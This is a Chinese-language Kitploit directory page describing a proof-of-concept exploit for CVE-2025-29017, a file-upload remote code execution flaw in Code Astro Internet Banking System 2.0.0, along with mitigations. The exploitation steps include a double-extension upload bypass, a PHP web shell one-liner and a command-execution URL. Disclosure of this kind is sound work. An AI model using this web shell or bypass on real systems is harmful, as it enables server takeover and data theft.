Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-29017 — 针对 CVE-2025-29017 的概念验证漏洞利用程序,演示了在 Code Astro Internet Banking System 2.0.0 中通过恶意文件上传实现远程代码执行。 | Kitploit
工具/GitHubGitHub/b1tm4r/cve-2025-29017
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubb1tm4r/cve-2025-29017

CVE-2025-29017

针对 CVE-2025-29017 的概念验证漏洞利用程序,演示了在 Code Astro Internet Banking System 2.0.0 中通过恶意文件上传实现远程代码执行。

查看仓库
121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-29017 - Internet Banking System 2.0.0 通过头像上传实现远程代码执行

描述

Code Astro Internet Banking System 2.0.0 中存在一个**远程代码执行(RCE)**漏洞,该漏洞源于 pages_view_client.php 中 profile_pic 参数的文件上传验证不严格。攻击者可以通过修改上传请求绕过安全检查,从而实现任意代码执行。

受影响组件

  • pages_view_client.php 中的 profile_pic 参数
  • 上传功能允许执行恶意 PHP 文件

利用步骤

  1. 前往用户个人资料设置页面,浏览选择新的头像图片。



  1. 使用 Burp Suite 等工具拦截头像上传请求。


  1. 将文件修改为双扩展名(.jpeg.php),将 Content-Type 头部改为 application/x-php,并追加恶意 PHP 代码:
root@kitploit:~
<?php system($_GET['cmd']); ?>



  1. 检查文件是否已上传至 /admin/dist/img/ 目录:
root@kitploit:~
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt


影响

  • 完全服务器遭入侵
  • 数据窃取
  • 权限提升

缓解措施

  • 仅允许上传图片格式文件,并验证 MIME 类型。
  • 清理文件名,阻止包含可执行代码的文件。
  • 将上传的文件存储在 Web 根目录之外。

参考资料

  • OWASP 文件上传安全
下载工具